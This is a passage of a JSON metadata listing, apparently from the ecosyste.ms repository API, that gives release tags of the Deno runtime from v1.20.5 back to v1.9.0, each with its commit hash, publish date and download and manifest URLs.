ags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codelo